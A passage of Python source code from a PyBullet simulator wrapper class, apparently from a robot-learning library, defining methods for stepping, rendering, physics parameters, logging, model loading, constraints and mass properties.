"""Perform a step in the simulator, and sleep the specified amount of time.
"stepSimulation will perform all the actions in a single forward dynamics simulation step such as collision
detection, constraint solving and integration. The default timestep is 1/240 second, it can be changed using
the setTimeStep or setPhysicsEngineParameter API." [1]
Args:
sleep_time (float): amount of time to sleep after performing one step in the simulation.
"""
self.sim.stepSimulation()
time.sleep(sleep_time)
def reset_scene_camera(self, camera=None):
"""
Reinitialize/Reset the scene view camera to the previous one.
Args:
camera (tuple of 3 float and a 3d np.array): tuple containing the (yaw, pitch, distance, target_position).
The yaw and pitch angles are expressed in radians, the distance in meter, and the target position is
a 3D vector.
"""
if camera is None:
camera = self._camera if self._camera is not None else self.get_debug_visualizer()[-4:]
yaw, pitch, distance, target = camera
self.reset_debug_visualizer(distance=distance, yaw=yaw, pitch=pitch, target_position=target)
def render(self, enable=True, mode='human'):
"""Render the GUI.
Warnings: note that this operation can be time consuming with the pybullet simulator if we need to change the
connection type. This is because we need to close the previous simulator, create a new one with the new
connection type, and reload everything into that new simulator. I would not advise to use it frequently in the
'human' mode. If the 'rgb' mode is used, you have to call this method frequently to get a new picture, however
do not call at a high frequency rate (depending on the picture size).
Args:
enable (bool): If True, it will render the simulator by enabling the GUI.
mode (str): specify the rendering mode. If mode=='human', it will render it in the simulator, if
mode=='rgb', it will return a picture taken with the main camera of the simulator.
Returns:
if mode == 'human':
None
if mode == 'rgb':
np.array[W,H,D]: RGB image
"""
if not self._render:
if enable:
if mode == 'human':
# self.sim.configureDebugVisualizer(self.sim.COV_ENABLE_RENDERING, 1)
if self.connection_mode == pybullet.DIRECT:
# save the state of the simulator
filename = 'PYROBOLEARN_RENDERING_STATE.bullet'
self.save(filename=filename)
# change the connection mode
self.connection_mode = pybullet.GUI
self.__init(self.connection_mode)
# load the state of the world in the simulator
self.load(filename)
os.remove(filename)
# reset the camera
self.reset_scene_camera(camera=self._camera)
elif mode == 'rgb' or mode == 'rgba':
width, height, view_matrix, projection_matrix = self.get_debug_visualizer()[:4]
img = np.asarray(self.get_camera_image(width, height, view_matrix, projection_matrix)[2])
img = img.reshape(width, height, 4) # RGBA
if mode == 'rgb':
return img[:, :, :3]
return img
else:
if mode == 'human':
# self.sim.configureDebugVisualizer(self.sim.COV_ENABLE_RENDERING, 0)
if self.connection_mode == pybullet.GUI:
# save the state of the simulator
filename = 'PYROBOLEARN_RENDERING_STATE.bullet'
self.save(filename=filename)
# save main camera configuration (for later)
self._camera = self.get_debug_visualizer()[-4:]
# change the connection mode
self.connection_mode = pybullet.DIRECT
self.__init(self.connection_mode)
# load the state of the world in the simulator
self.load(filename)
os.remove(filename)
# set the render variable (useful when calling the method `is_rendering`)
self._render = enable
def get_time_step(self):
"""Get the time step in the simulator.
Returns:
float: time step in the simulator
"""
return self.get_physics_properties()['fixed_time_step']
def set_time_step(self, time_step):
"""Set the specified time step in the simulator.
"Warning: in many cases it is best to leave the timeStep to default, which is 240Hz. Several parameters are
tuned with this value in mind. For example the number of solver iterations and the error reduction parameters
(erp) for contact, friction and non-contact joints are related to the time step. If you change the time step,
you may need to re-tune those values accordingly, especially the erp values.
You can set the physics engine timestep that is used when calling 'stepSimulation'. It is best to only call
this method at the start of a simulation. Don't change this time step regularly. setTimeStep can also be
achieved using the new setPhysicsEngineParameter API." [1]
Args:
time_step (float): Each time you call 'step' the time step will proceed with 'time_step'.
"""
# self.history.append(('set_time_step', {'time_step': time_step}))
self.dt = time_step
self.sim.setTimeStep(timeStep=time_step)
def set_real_time(self, enable=True):
"""Enable/disable real time in the simulator.
"By default, the physics server will not step the simulation, unless you explicitly send a 'stepSimulation'
command. This way you can maintain control determinism of the simulation. It is possible to run the simulation
in real-time by letting the physics server automatically step the simulation according to its real-time-clock
(RTC) using the setRealTimeSimulation command. If you enable the real-time simulation, you don't need to call
'stepSimulation'.
Note that setRealTimeSimulation has no effect in DIRECT mode: in DIRECT mode the physics server and client
happen in the same thread and you trigger every command. In GUI mode and in Virtual Reality mode, and TCP/UDP
mode, the physics server runs in a separate thread from the client (PyBullet), and setRealTimeSimulation
allows the physicsserver thread to add additional calls to stepSimulation." [1]
Args:
enable (bool): If True, it will enable the real-time simulation. If False, it will disable it.
"""
super(Bullet, self).set_real_time(enable=enable)
self.sim.setRealTimeSimulation(enableRealTimeSimulation=int(enable))
def pause(self):
"""Pause the simulator if in real-time."""
self.set_real_time(False)
def unpause(self):
"""Unpause the simulator if in real-time."""
self.set_real_time(True)
def get_physics_properties(self):
"""Get the physics engine parameters.
Returns:
dict: dictionary containing the following tags with their corresponding values: ['gravity',
'num_solver_iterations', 'use_real_time_simulation', 'num_sub_steps', 'fixed_time_step']
"""
d = self.sim.getPhysicsEngineParameters()
properties = dict()
properties['gravity'] = np.asarray([d['gravityAccelerationX'], d['gravityAccelerationY'],
d['gravityAccelerationZ']])
properties['num_solver_iterations'] = d['numSolverIterations']
properties['use_real_time_simulation'] = d['useRealTimeSimulation']
properties['num_sub_steps'] = d['numSubSteps']
properties['fixed_time_step'] = d['fixedTimeStep']
return properties
def set_physics_properties(self, time_step=None, num_solver_iterations=None, use_split_impulse=None,
split_impulse_penetration_threshold=None, num_sub_steps=None,
collision_filter_mode=None, contact_breaking_threshold=None, max_num_cmd_per_1ms=None,
enable_file_caching=None, restitution_velocity_threshold=None, erp=None,
contact_erp=None, friction_erp=None, enable_cone_friction=None,
deterministic_overlapping_pairs=None, solver_residual_threshold=None, **kwargs):
"""Set the physics engine parameters.
Args:
time_step (float): See the warning in the `set_time_step` section. Physics engine timestep in
fraction of seconds, each time you call `step` simulated time will progress this amount.
Same as `set_time_step`. Default to 1./240.
num_solver_iterations (int): Choose the maximum number of constraint solver iterations. If the
`solver_residual_threshold` is reached, the solver may terminate before the `num_solver_iterations`.
Default to 50.
use_split_impulse (int): Advanced feature, only when using maximal coordinates: split the positional
constraint solving and velocity constraint solving in two stages, to prevent huge penetration recovery
forces.
split_impulse_penetration_threshold (float): Related to 'useSplitImpulse': if the penetration for a
particular contact constraint is less than this specified threshold, no split impulse will happen for
that contact.
num_sub_steps (int): Subdivide the physics simulation step further by 'numSubSteps'. This will trade
performance over accuracy.
collision_filter_mode (int): Use 0 for default collision filter: (group A&maskB) AND (groupB&maskA).
Use 1 to switch to the OR collision filter: (group A&maskB) OR (groupB&maskA).
contact_breaking_threshold (float): Contact points with distance exceeding this threshold are not
processed by the LCP solver. In addition, AABBs are extended by this number. Defaults to 0.02 in
Bullet 2.x.
max_num_cmd_per_1ms (int): Experimental: add 1ms sleep if the number of commands executed exceed this
threshold
enable_file_caching (bool): Set to 0 to disable file caching, such as .obj wavefront file loading
restitution_velocity_threshold (float): If relative velocity is below this threshold, restitution will be
zero.
erp (float): constraint error reduction parameter (non-contact, non-friction)
contact_erp (float): contact error reduction parameter
friction_erp (float): friction error reduction parameter (when positional friction anchors are enabled)
enable_cone_friction (bool): Set to False to disable implicit cone friction and use pyramid approximation
(cone is default)
deterministic_overlapping_pairs (bool): Set to True to enable and False to disable sorting of overlapping
pairs (backward compatibility setting).
solver_residual_threshold (float): velocity threshold, if the maximum velocity-level error for each
constraint is below this threshold the solver will terminate (unless the solver hits the
numSolverIterations). Default value is 1e-7.
"""
kwargs = {}
if time_step is not None:
kwargs['fixedTimeStep'] = time_step
if num_solver_iterations is not None:
kwargs['numSolverIterations'] = num_solver_iterations
if use_split_impulse is not None:
kwargs['useSplitImpulse'] = use_split_impulse
if split_impulse_penetration_threshold is not None:
kwargs['splitImpulsePenetrationThreshold'] = split_impulse_penetration_threshold
if num_sub_steps is not None:
kwargs['numSubSteps'] = num_sub_steps
if collision_filter_mode is not None:
kwargs['collisionFilterMode'] = collision_filter_mode
if contact_breaking_threshold is not None:
kwargs['contactBreakingThreshold'] = contact_breaking_threshold
if max_num_cmd_per_1ms is not None:
kwargs['maxNumCmdPer1ms'] = max_num_cmd_per_1ms
if enable_file_caching is not None:
kwargs['enableFileCaching'] = enable_file_caching
if restitution_velocity_threshold is not None:
kwargs['restitutionVelocityThreshold'] = restitution_velocity_threshold
if erp is not None:
kwargs['erp'] = erp
if contact_erp is not None:
kwargs['contactERP'] = contact_erp
if friction_erp is not None:
kwargs['frictionERP'] = friction_erp
if enable_cone_friction is not None:
kwargs['enableConeFriction'] = int(enable_cone_friction)
if deterministic_overlapping_pairs is not None:
kwargs['deterministicOverlappingPairs'] = int(deterministic_overlapping_pairs)
if solver_residual_threshold is not None:
kwargs['solverResidualThreshold'] = solver_residual_threshold
self.sim.setPhysicsEngineParameter(**kwargs)
def start_logging(self, logging_type, filename, object_unique_ids, max_log_dof, body_unique_id_A, body_unique_id_B,
link_index_A, link_index_B, device_type_filter, log_flags):
"""
Start the logging.
Args:
logging_type (int): There are various types of logging implemented.
- STATE_LOGGING_MINITAUR (=0): This will require to load the `quadruped/quadruped.urdf` and object
unique id from the quadruped. It logs the timestamp, IMU roll/pitch/yaw, 8 leg motor positions
(q0-q7), 8 leg motor torques (u0-u7), the forward speed of the torso and mode (unused in
simulation).
- STATE_LOGGING_GENERIC_ROBOT (=1): This will log a log of the data of either all objects or selected
ones (if `object_unique_ids` is provided).
- STATE_LOGGING_VIDEO_MP4 (=3): this will open an MP4 file and start streaming the OpenGL 3D
visualizer pixels to the file using an ffmpeg pipe. It will require ffmpeg installed. You can
also use avconv (default on Ubuntu), just create a symbolic link so that ffmpeg points to avconv.
- STATE_LOGGING_CONTACT_POINTS (=5)
- STATE_LOGGING_VR_CONTROLLERS (=2)
- STATE_LOGGING_PROFILE_TIMINGS (=6): This will dump a timings file in JSON format that can be opened
using Google Chrome about://tracing LOAD.
filename (str): file name (absolute or relative path) to store the log file data
object_unique_ids (list[int]): If left empty, the logger may log every object, otherwise the logger just
logs the objects in the object_unique_ids list.
max_log_dof (int): Maximum number of joint degrees of freedom to log (excluding the base dofs).
This applies to STATE_LOGGING_GENERIC_ROBOT_DATA. Default value is 12. If a robot exceeds the number
of dofs, it won't get logged at all.
body_unique_id_A (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided,only log contact points
involving body_unique_id_A.
body_unique_id_B (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided,only log contact points
involving body_unique_id_B.
link_index_A (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided, only log contact points
involving link_index_A for body_unique_id_A.
link_index_B (int): Applies to STATE_LOGGING_CONTACT_POINTS (=5). If provided, only log contact points
involving link_index_B for body_unique_id_B.
device_type_filter (int): deviceTypeFilter allows you to select what VR devices to log:
VR_DEVICE_CONTROLLER (=1), VR_DEVICE_HMD (=2), VR_DEVICE_GENERIC_TRACKER (=4) or any combination of
them. Applies to STATE_LOGGING_VR_CONTROLLERS (=2). Default values is VR_DEVICE_CONTROLLER (=1).
log_flags (int): (upcoming PyBullet 1.3.1). STATE_LOG_JOINT_TORQUES (=3), to log joint torques due to
joint motors.
Returns:
int: non-negative logging unique id.
"""
kwargs = {}
if object_unique_ids is not None:
kwargs['objectUniqueIds'] = object_unique_ids
if max_log_dof is not None:
kwargs['maxLogDof'] = max_log_dof
if body_unique_id_A is not None:
kwargs['bodyUniqueIdA'] = body_unique_id_A
if body_unique_id_B is not None:
kwargs['bodyUniqueIdB'] = body_unique_id_B
if link_index_A is not None:
kwargs['linkIndexA'] = link_index_A
if link_index_B is not None:
kwargs['linkIndexB'] = link_index_B
if device_type_filter is not None:
kwargs['deviceTypeFilter'] = device_type_filter
if log_flags is not None:
kwargs['logFlags'] = log_flags
self.sim.startStateLogging(logging_type, filename, **kwargs)
def stop_logging(self, logger_id):
"""Stop the logging.
Args:
logger_id (int): unique logger id.
"""
self.sim.stopStateLogging(logger_id)
def get_gravity(self):
"""Return the gravity set in the simulator."""
return self.get_physics_properties()['gravity']
def set_gravity(self, gravity=(0, 0, -9.81)):
"""Set the gravity in the simulator with the given acceleration.
By default, there is no gravitational force enabled in the simulator.
Args:
gravity (list, tuple of 3 floats): acceleration in the x, y, z directions.
"""
self.sim.setGravity(gravity[0], gravity[1], gravity[2])
def save(self, filename=None, *args, **kwargs):
"""
Save the state of the simulator.
Args:
filename (None, str): path to file to store the state of the simulator. If None, it will save it in
memory instead of the disk.
Returns:
int / str: unique state id, or filename. This id / filename can be used to load the state.
"""
if filename is None:
return self.sim.saveState()
self.sim.saveBullet(filename)
return filename
def load(self, state, *args, **kwargs):
"""
Load/Restore the simulator to a previous state.
Args:
state (int, str): unique state id, or path to the file containing the state.
"""
if isinstance(state, int):
self.sim.restoreState(stateId=state)
elif isinstance(state, str):
self.sim.restoreState(fileName=state)
def load_plugin(self, plugin_path, name, *args, **kwargs):
"""Load a certain plugin in the simulator.
Few examples can be found at: https://github.com/bulletphysics/bullet3/tree/master/examples/SharedMemory/plugins
Args:
plugin_path (str): path, location on disk where to find the plugin
name (str): postfix name of the plugin that is appended to each API
Returns:
int: unique plugin id. If this id is negative, the plugin is not loaded. Once a plugin is loaded, you can
send commands to the plugin using `execute_plugin_commands`
"""
return self.sim.loadPlugin(plugin_path, name)
def execute_plugin_command(self, plugin_id, *args):
"""Execute the commands on the specified plugin.
Args:
plugin_id (int): unique plugin id.
*args (list): list of argument values to be interpreted by the plugin. One can be a string, while the
others must be integers or float.
"""
kwargs = {}
for arg in args:
if isinstance(arg, str):
kwargs['textArgument'] = arg
elif isinstance(arg, int):
kwargs.setdefault('intArgs', []).append(arg)
elif isinstance(arg, float):
kwargs.setdefault('floatArgs', []).append(arg)
self.sim.executePluginCommand(plugin_id, **kwargs)
def unload_plugin(self, plugin_id, *args, **kwargs):
"""Unload the specified plugin from the simulator.
Args:
plugin_id (int): unique plugin id.
"""
self.sim.unloadPlugin(plugin_id)
######################################
# loading URDFs, SDFs, MJCFs, meshes #
######################################
def _load_urdf(self, filename, position=None, orientation=None, use_maximal_coordinates=None,
use_fixed_base=None, flags=None, scale=None):
"""Load the given URDF file.
The load_urdf will send a command to the physics server to load a physics model from a Universal Robot
Description File (URDF). The URDF file is used by the ROS project (Robot Operating System) to describe robots
and other objects, it was created by the WillowGarage and the Open Source Robotics Foundation (OSRF).
Many robots have public URDF files, you can find a description and tutorial here:
http://wiki.ros.org/urdf/Tutorials
Important note:
most joints (slider, revolute, continuous) have motors enabled by default that prevent free
motion. This is similar to a robot joint with a very high-friction harmonic drive. You should set the joint
motor control mode and target settings using `pybullet.setJointMotorControl2`. See the
`setJointMotorControl2` API for more information.
Warning:
by default, PyBullet will cache some files to speed up loading. You can disable file caching using
`setPhysicsEngineParameter(enableFileCaching=0)`.
Args:
filename (str): a relative or absolute path to the URDF file on the file system of the physics server.
position (np.array[float[3]]): create the base of the object at the specified position in world space
coordinates [x,y,z].
orientation (np.array[float[4]]): create the base of the object at the specified orientation as world
space quaternion [x,y,z,w].
use_maximal_coordinates (int): Experimental. By default, the joints in the URDF file are created using the
reduced coordinate method: the joints are simulated using the Featherstone Articulated Body algorithm
(btMultiBody in Bullet 2.x). The useMaximalCoordinates option will create a 6 degree of freedom rigid
body for each link, and constraints between those rigid bodies are used to model joints.
use_fixed_base (bool): force the base of the loaded object to be static
flags (int): URDF_USE_INERTIA_FROM_FILE (val=2): by default, Bullet recomputed the inertia tensor based on
mass and volume of the collision shape. If you can provide more accurate inertia tensor, use this flag.
URDF_USE_SELF_COLLISION (val=8): by default, Bullet disables self-collision. This flag let's you
enable it.
You can customize the self-collision behavior using the following flags:
* URDF_USE_SELF_COLLISION_EXCLUDE_PARENT (val=16) will discard self-collision between links that
are directly connected (parent and child).
* URDF_USE_SELF_COLLISION_EXCLUDE_ALL_PARENTS (val=32) will discard self-collisions between a
child link and any of its ancestors (parents, parents of parents, up to the base).
* URDF_USE_IMPLICIT_CYLINDER (val=128), will use a smooth implicit cylinder. By default, Bullet
will tessellate the cylinder into a convex hull.
scale (float): scale factor to the URDF model.
Returns:
int (non-negative): unique id associated to the load model.
"""
kwargs = {}
if position is not None:
if isinstance(position, np.ndarray):
position = position.ravel().tolist()
kwargs['basePosition'] = position
if orientation is not None:
if isinstance(orientation, np.ndarray):
orientation = orientation.ravel().tolist()
kwargs['baseOrientation'] = orientation
if use_maximal_coordinates is not None:
kwargs['useMaximalCoordinates'] = use_maximal_coordinates
if use_fixed_base is not None:
kwargs['useFixedBase'] = use_fixed_base
if flags is not None:
kwargs['flags'] = flags
if scale is not None:
kwargs['globalScaling'] = scale
model_id = self.sim.loadURDF(filename, **kwargs)
# if model_id > -1:
# frame = inspect.currentframe()
# args, _, _, values = inspect.getargvalues(frame)
# self.history.append(('load_urdf', {arg: values[arg] for arg in args[1:]}))
return model_id
def load_sdf(self, filename, scaling=1., *args, **kwargs):
"""Load the given SDF file.
The load_sdf command only extracts some essential parts of the SDF related to the robot models and geometry,
and ignores many elements related to cameras, lights and so on.
Args:
filename (str): a relative or absolute path to the SDF file on the file system of the physics server.
scaling (float): scale factor for the object
Returns:
list(int): list of object unique id for each object loaded
"""
return self.sim.loadSDF(filename, globalScaling=scaling)
def load_mjcf(self, filename, scaling=1., *args, **kwargs):
"""Load the given MJCF file.
"The load_mjcf command performs basic import of MuJoCo MJCF xml files, used in OpenAI Gym". [1]
It will load all the object described in a MJCF file.
Args:
filename (str): a relative or absolute path to the MJCF file on the file system of the physics server.
scaling (float): scale factor for the object
Returns:
list(int): list of object unique id for each object loaded
"""
return self.sim.loadMJCF(filename)
def load_mesh(self, filename, position, orientation=(0, 0, 0, 1), mass=1., scale=(1., 1., 1.),
color=None, with_collision=True, flags=None, *args, **kwargs):
"""
Load a mesh in the world (only available in the simulator).
Warnings (see https://github.com/bulletphysics/bullet3/issues/1813):
- it only accepts wavefront obj files
- wavefront obj files can have at most 1 texture
- there is a limited pre-allocated memory for visual meshes
Args:
filename (str): path to file for the mesh. Currently, only Wavefront .obj. It will create convex hulls
for each object (marked as 'o') in the .obj file.
position (list[float[3]], np.array[float[3]]): position of the mesh in the Cartesian world space (in meters)
orientation (list[float[4]], np.array[float[4]]): orientation of the mesh using quaternion [x,y,z,w].
mass (float): mass of the mesh (in kg). If mass = 0, it won't move even if there is a collision.
scale (list[float[3]], np.array[float[3]]): scale the mesh in the (x,y,z) directions
color (list[int[4]], None): color of the mesh for red, green, blue, and alpha, each in range [0,1].
with_collision (bool): If True, it will also create the collision mesh, and not only a visual mesh.
flags (int, None): if flag = `sim.GEOM_FORCE_CONCAVE_TRIMESH` (=1), this will create a concave static
triangle mesh. This should not be used with dynamic/moving objects, only for static (mass=0) terrain.
Returns:
int: unique id of the mesh in the world
"""
kwargs = {}
if flags is not None:
kwargs['flags'] = flags
# create collision shape if specified
collision_shape = None
if with_collision:
collision_shape = self.sim.createCollisionShape(pybullet.GEOM_MESH, fileName=filename, meshScale=scale,
**kwargs)
if color is not None:
kwargs['rgbaColor'] = color
# create visual shape
visual_shape = self.sim.createVisualShape(pybullet.GEOM_MESH, fileName=filename, meshScale=scale, **kwargs)
# create body
if with_collision:
mesh = self.sim.createMultiBody(baseMass=mass,
baseCollisionShapeIndex=collision_shape,
baseVisualShapeIndex=visual_shape,
basePosition=position,
baseOrientation=orientation)
else:
mesh = self.sim.createMultiBody(baseMass=mass,
baseVisualShapeIndex=visual_shape,
basePosition=position,
baseOrientation=orientation)
return mesh
@staticmethod
def _get_3d_models(extension, fullpath=False):
"""Return the list of 3d models (urdf, sdf, mjcf/xml, obj).
Args:
extension (str): extension of the 3D models (urdf, sdf, mjcf/xml, obj).
fullpath (bool): If True, it will return the full path to the 3D objects. If False, it will just return
the name of the files (without the extension).
"""
extension = '.' + extension
path = pybullet_data.getDataPath()
results = []
for dir_path, dir_names, filenames in os.walk(path):
for filename in filenames:
if os.path.splitext(filename)[1] == extension:
if fullpath:
results.append(os.path.join(dir_path, filename)) # append the fullpath
else:
results.append(filename[:-len(extension)]) # remove extension
return results
@staticmethod
def get_available_sdfs(fullpath=False):
"""Return the list of available SDFs from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the SDFs. If False, it will just return the
name of the SDF files (without the extension).
"""
return Bullet._get_3d_models(extension='sdf', fullpath=fullpath)
@staticmethod
def get_available_urdfs(fullpath=False):
"""Return the list of available URDFs from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the URDFs. If False, it will just return the
name of the URDF files (without the extension).
"""
return Bullet._get_3d_models(extension='urdf', fullpath=fullpath)
@staticmethod
def get_available_mjcfs(fullpath=False):
"""Return the list of available MJCFs (=XMLs) from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the MJCFs/XMLs. If False, it will just return
the name of the MJCF/XML files (without the extension).
"""
results1 = Bullet._get_3d_models(extension='mjcf', fullpath=fullpath)
results2 = Bullet._get_3d_models(extension='xml', fullpath=fullpath)
return results1 + results2
@staticmethod
def get_available_objs(fullpath=False):
"""Return the list of available OBJs from the `pybullet_data.getDataPath()` method.
Args:
fullpath (bool): If True, it will return the full path to the OBJs. If False, it will just return the
name of the OBJ files (without the extension).
"""
return Bullet._get_3d_models(extension='obj', fullpath=fullpath)
##########
# Bodies #
##########
def load_floor(self, dimension=20):
"""Load a floor in the simulator.
Args:
dimension (float): dimension of the floor.
Returns:
int: non-negative unique id for the floor, or -1 for failure.
"""
return self.load_urdf('plane.urdf', position=[0., 0., 0.], use_fixed_base=True, scale=dimension/20.)
# TODO: add the other arguments
def create_body(self, visual_shape_id=-1, collision_shape_id=-1, mass=0., position=(0., 0., 0.),
orientation=(0., 0., 0., 1.), *args, **kwargs):
"""Create a body in the simulator.
Args:
visual_shape_id (int): unique id from createVisualShape or -1. You can reuse the visual shape (instancing)
collision_shape_id (int): unique id from createCollisionShape or -1. You can re-use the collision shape
for multiple multibodies (instancing)
mass (float): mass of the base, in kg (if using SI units)
position (np.array[float[3]]): Cartesian world position of the base
orientation (np.array[float[4]]): Orientation of base as quaternion [x,y,z,w]
Returns:
int: non-negative unique id or -1 for failure.
"""
if isinstance(position, np.ndarray):
position = position.ravel().tolist()
if isinstance(orientation, np.ndarray):
orientation = orientation.ravel().tolist()
return self.sim.createMultiBody(baseMass=mass, baseCollisionShapeIndex=collision_shape_id,
baseVisualShapeIndex=visual_shape_id, basePosition=position,
baseOrientation=orientation, **kwargs)
def remove_body(self, body_id):
"""Remove a particular body in the simulator.
Args:
body_id (int): unique body id.
"""
self.sim.removeBody(body_id)
def num_bodies(self):
"""Return the number of bodies present in the simulator.
Returns:
int: number of bodies
"""
return self.sim.getNumBodies()
def get_body_info(self, body_id):
"""Get the specified body information.
Specifically, it returns the base name extracted from the URDF, SDF, MJCF, or other file.
Args:
body_id (int): unique body id.
Returns:
str: base name
"""
name = self.sim.getBodyInfo(body_id)
name = name if isinstance(name, str) else name.decode("utf-8")
return name
def get_body_id(self, index):
"""
Get the body id associated to the index which is between 0 and `num_bodies()`.
Args:
index (int): index between [0, `num_bodies()`]
Returns:
int: unique body id.
"""
return self.sim.getBodyUniqueId(index)
###############
# constraints #
###############
def create_constraint(self, parent_body_id, parent_link_id, child_body_id, child_link_id, joint_type,
joint_axis, parent_frame_position, child_frame_position,
parent_frame_orientation=(0., 0., 0., 1.), child_frame_orientation=(0., 0., 0., 1.),
*args, **kwargs):
"""
Create a constraint.
"URDF, SDF and MJCF specify articulated bodies as a tree-structures without loops. The 'createConstraint'
allows you to connect specific links of bodies to close those loops. In addition, you can create arbitrary
constraints between objects, and between an object and a specific world frame.
It can also be used to control the motion of physics objects, driven by animated frames, such as a VR
controller. It is better to use constraints, instead of setting the position or velocity directly for
such purpose, since those constraints are solved together with other dynamics constraints." [1]
Args:
parent_body_id (int): parent body unique id
parent_link_id (int): parent link index (or -1 for the base)
child_body_id (int): child body unique id, or -1 for no body (specify a non-dynamic child frame in world
coordinates)
child_link_id (int): child link index, or -1 for the base
joint_type (int): joint type: JOINT_PRISMATIC (=1), JOINT_FIXED (=4), JOINT_POINT2POINT (=5),
JOINT_GEAR (=6). If the JOINT_FIXED is set, the child body's link will not move with respect to the
parent body's link. If the JOINT_PRISMATIC is set, the child body's link will only be able to move
along the given joint axis with respect to the parent body's link. If the JOINT_POINT2POINT is set
(which should really be called spherical), the child body's link will be able to rotate along the 3
axis while maintaining the given position relative to the parent body's link. If the JOINT_GEAR can be
set between two links of the same body.
joint_axis (np.array[float[3]]): joint axis, in child link frame
parent_frame_position (np.array[float[3]]): position of the joint frame relative to parent CoM frame.
child_frame_position (np.array[float[3]]): position of the joint frame relative to a given child CoM frame
(or world origin if no child specified)
parent_frame_orientation (np.array[float[4]]): the orientation of the joint frame relative to parent CoM
coordinate frame
child_frame_orientation (np.array[float[4]]): the orientation of the joint frame relative to the child CoM
coordinate frame (or world origin frame if no child specified)
Examples:
- `pybullet/examples/quadruped.py`
- `pybullet/examples/constraint.py`
Returns:
int: constraint unique id.
"""
return self.sim.createConstraint(parent_body_id, parent_link_id, child_body_id, child_link_id, joint_type,
joint_axis, parent_frame_position, child_frame_position,
parent_frame_orientation, child_frame_orientation)
def remove_constraint(self, constraint_id):
"""
Remove the specified constraint.
Args:
constraint_id (int): constraint unique id.
"""
self.sim.removeConstraint(constraint_id)
def change_constraint(self, constraint_id, child_joint_pivot=None, child_frame_orientation=None, max_force=None,
gear_ratio=None, gear_auxiliary_link=None, relative_position_target=None, erp=None, *args,
**kwargs):
"""
Change the parameters of an existing constraint.
Args:
constraint_id (int): constraint unique id.
child_joint_pivot (np.array[float[3]]): updated position of the joint frame relative to a given child CoM
frame (or world origin if no child specified)
child_frame_orientation (np.array[float[4]]): updated child frame orientation as quaternion [x,y,z,w]
max_force (float): maximum force that constraint can apply
gear_ratio (float): the ratio between the rates at which the two gears rotate
gear_auxiliary_link (int): In some cases, such as a differential drive, a third (auxilary) link is used as
reference pose. See `racecar_differential.py`
relative_position_target (float): the relative position target offset between two gears
erp (float): constraint error reduction parameter
"""
kwargs = {}
if child_joint_pivot is not None:
kwargs['jointChildPivot'] = child_joint_pivot
if child_frame_orientation is not None:
kwargs['jointChildFrameOrientation'] = child_frame_orientation
if max_force is not None:
kwargs['maxForce'] = max_force
if gear_ratio is not None:
kwargs['gearRatio'] = gear_ratio
if gear_auxiliary_link is not None:
kwargs['gearAuxLink'] = gear_auxiliary_link
if relative_position_target is not None:
kwargs['relativePositionTarget'] = relative_position_target
if erp is not None:
kwargs['erp'] = erp
self.sim.changeConstraint(constraint_id, **kwargs)
def num_constraints(self):
"""
Get the number of constraints created.
Returns:
int: number of constraints created.
"""
return self.sim.getNumConstraints()
def get_constraint_id(self, index):
"""
Get the constraint unique id associated with the index which is between 0 and `num_constraints()`.
Args:
index (int): index between [0, `num_constraints()`]
Returns:
int: constraint unique id.
"""
return self.sim.getConstraintUniqueId(index)
def get_constraint_info(self, constraint_id):
"""
Get information about the given constaint id.
Args:
constraint_id (int): constraint unique id.
Returns:
int: parent_body_id
int: parent_joint_id (if -1, it is the base)
int: child_body_id (if -1, no body; specify a non-dynamic child frame in world coordinates)
int: child_link_id (if -1, it is the base)
int: constraint/joint type
np.array[float[3]]: joint axis
np.array[float[3]]: joint pivot (position) in parent CoM frame
np.array[float[3]]: joint pivot (position) in specified child CoM frame (or world frame if no specified
child)
np.array[float[4]]: joint frame orientation relative to parent CoM coordinate frame
np.array[float[4]]: joint frame orientation relative to child CoM frame (or world frame if no specified
child)
float: maximum force that constraint can apply
"""
return self.sim.getConstraintInfo(constraint_id)
def get_constraint_state(self, constraint_id):
"""
Get the state of the given constraint.
Args:
constraint_id (int): constraint unique id.
Returns:
list[float[D]]: applied constraint forces. Its dimension is the degrees of freedom that are affected by
the constraint (a fixed constraint affects 6 DoF for example)
"""
return self.sim.getConstraintState(constraint_id)
###########
# objects #
###########
def get_mass(self, body_id):
"""
Return the total mass of the robot (=sum of all mass links).
Args:
body_id (int): unique object id, as returned from `load_urdf`.
Returns:
float: total mass of the robot [kg]
"""
return np.sum(self.get_link_masses(body_id, [-1] + list(range(self.num_links(body_id)))))
def get_base_mass(self, body_id):
"""Return the base mass of the robot.
Args:
body_id (int): unique object id.
"""
return self.get_link_masses(body_id, -1)
def get_base_name(self, body_id):
"""
Return the base name.
Args:
body_id (int): unique object id.
Returns:
str: base name
"""
name = self.sim.getBodyInfo(body_id)[0]
name = name if isinstance(name, str) else name.decode("utf-8")
return name
def get_center_of_mass_position(self, body_id, link_ids=None):
"""
Return the center of mass position.
Args:
body_id (int): unique body id.
link_ids (list[int]): link ids associated with the given body id. If None, it will take all the links
of the specified body.
Returns:
np.array[float[3]]: center of mass position in the Cartesian world coordinates
"""
if link_ids is None:
link_ids = list(range(self.num_links(body_id)))
pos = self.get_link_world_positions(body_id, link_ids)
mass = self.get_link_masses(body_id, link_ids)
com = np.sum(pos.T * mass, axis=1) / np.sum(mass)
return com
def get_center_of_mass_velocity(self, body_id, link_ids=None):
"""
Return the center of mass linear velocity.
Args:
body_id (int): unique body id.
link_ids (list[int]): link ids associated with the given body id. If None, it will take all the links
of the specified body.
Returns:
np.array[float[3]]: center of mass linear velocity.
"""
if link_ids is None:
link_ids = list(range(self.num_links(body_id)))
vel = self.get_link_world_linear_velocities(body_id, link_ids)
mass = self.get_link_masses(body_id, link_ids)
com = np.sum(vel.T * mass, axis=1) / np.sum(mass)
return com
def get_linear_momentum(self, body_id, link_ids=None):
"""
Return the total linear momentum in the world space.
Returns:
np.array[float[3]]: linear momentum
"""
if link_ids is None:
link_ids = list(range(self.num_links(body_id)))
mass = self.get_link_masses(body_id, link_ids)
vel = self.get_link_world_linear_velocities(body_id, link_ids)
return np.sum(vel.T * mass, axis=1)
def get_base_pose(self, body_id):
"""
Get the current position and orientation of the base (or root link) of the body in Cartesian world coordinates.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: base position
np.array[float[4]]: base orientation (quaternion [x,y,z,w])
